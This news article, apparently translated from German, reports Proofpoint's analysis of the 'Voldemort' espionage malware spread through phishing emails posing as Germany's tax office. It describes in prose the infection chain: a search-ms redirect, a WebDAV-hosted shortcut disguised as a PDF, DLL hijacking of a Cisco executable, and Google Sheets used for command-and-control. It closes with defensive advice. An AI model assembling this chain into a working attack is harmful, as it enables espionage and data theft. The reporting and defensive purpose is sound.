"Voldemort" malware: Attackers are increasingly targeting taxpayers
The Voldemort malware is intended for espionage. However, it only becomes active after security warnings have been ignored several times.
A new wave of attacks is increasingly targeting tax authorities as well as other authorities and companies in various countries, including in Germany. The "Voldemort" malware is being spread via phishing emails. Anyone who clicks may install a backdoor. This is reported by the cyber security experts at Proofpoint. According to the report, 20,000 emails have already been sent worldwide – More than 70 organizations from almost all sectors are affected.
More than half of the organizations affected are in the insurance, aerospace, transport and education sectors. The originator of this campaign is unknown, but Proofpoint suspects that the main objective is espionage.
Fraudsters have been active "for some time"
"For some time, fraudsters have been trying to obtain information from taxpayers via various email addresses, such as 'poststelle@bzst.bund.de'," according to the BZSt (Federal Central Tax Office). Those affected receive phishing e-mails in which supposed changes to the tax return are mentioned, but this is not true. Anyone who receives a suspicious email should report it to the BZSt (oeffentlichkeitsarbeit@bzst.bund.de).
What is striking is "the combination of common and unusual techniques, including the use of Google Sheets to control the malware (C2) and the exploitation of a vulnerability in connection with saved search files (.search-ms)", explains Proofpoint. An analysis of the malware written in C has shown that data from infected computers is collected and sent back to the attackers.
The attackers send phishing emails designed to trick victims into clicking on a link that redirects them to a landing page containing a "Google AMP Cache" URL hosted by the free web hosting service InfinityFree. On the landing page, you can click "Click to view document" to view the supposedly important document from the email.
If the user agent contains "windows", the browser is redirected to a "search-ms" URI, which displays a pop-up and prompts the user to open Windows Explorer. At the same time, an image is loaded to log the successful redirection and collect additional information. If the user agent does not contain "windows", the browser is redirected to an empty Google Drive URL and an image is loaded to log the clicks.
For Windows users, it continues
After opening Windows Explorer, it executes a Windows search query that contains a Windows shortcut file (LNK) or a ZIP file. These files are hosted on a TryCloudflare host in a WebDAV directory and appear as local files in the user's download folder. The LNK file is disguised as a supposed PDF file to deceive the user.
When the LNK file is executed, it launches PowerShell to run 'Python.exe' from a WebDAV share and load a Python script. The script collects information from the computer and sends it as a Base64-encoded string to a log URL.
Voldemort uses a vulnerability in 'CiscoCollabHost.exe' for DLL hijacking and loads a manipulated 'CiscoSparkLauncher.dll', which in this case contains the Voldemort-specific data. In fact, it is sufficient that the DLL has the correct name and exports a function called SparkEntryPoint
. The malware injected in this way starts with a delay, for example to bypass a sandbox in use, and then makes API calls whose functions are dynamically decrypted.
The malware's configuration data is encrypted and is decrypted by a special routine in the code, using an "egg hunting" mechanism. The malware searches for a specific character string in the process memory to use the information from there. The configuration contains information such as client ID and client secret, which is used to communicate with the command-and-control (C2) server, which runs via Google Sheets.
According to Proofpoint, "the attackers use the Google Sheets infrastructure not only to command and control, but also to exfiltrate data and execute commands on the infected machines". It can execute various commands such as 'Ping', 'Dir', 'Download' and 'Exec'. Communication is encrypted and the data is stored in the Google Sheets infrastructure. "Evidence of OpenWRT firmware and a compromised Cobalt Strike server" were also found, which could be linked to other activities of the attackers.
Spy malware
Proofpoint suspects that the campaign is aimed more at espionage because the malware is designed to collect information and can download further malware. It is also likely to be a government-related APT (Advanced Persistent Threat) attack.
It is recommended to restrict access to external file sharing services, block network connections to TryCloudflare and monitor the use of 'search-ms' and suspicious activity such as LNK and PowerShell executions. Proofpoint also lists Indicators of Compromise (IoCs) and suspicious signatures.
(mack)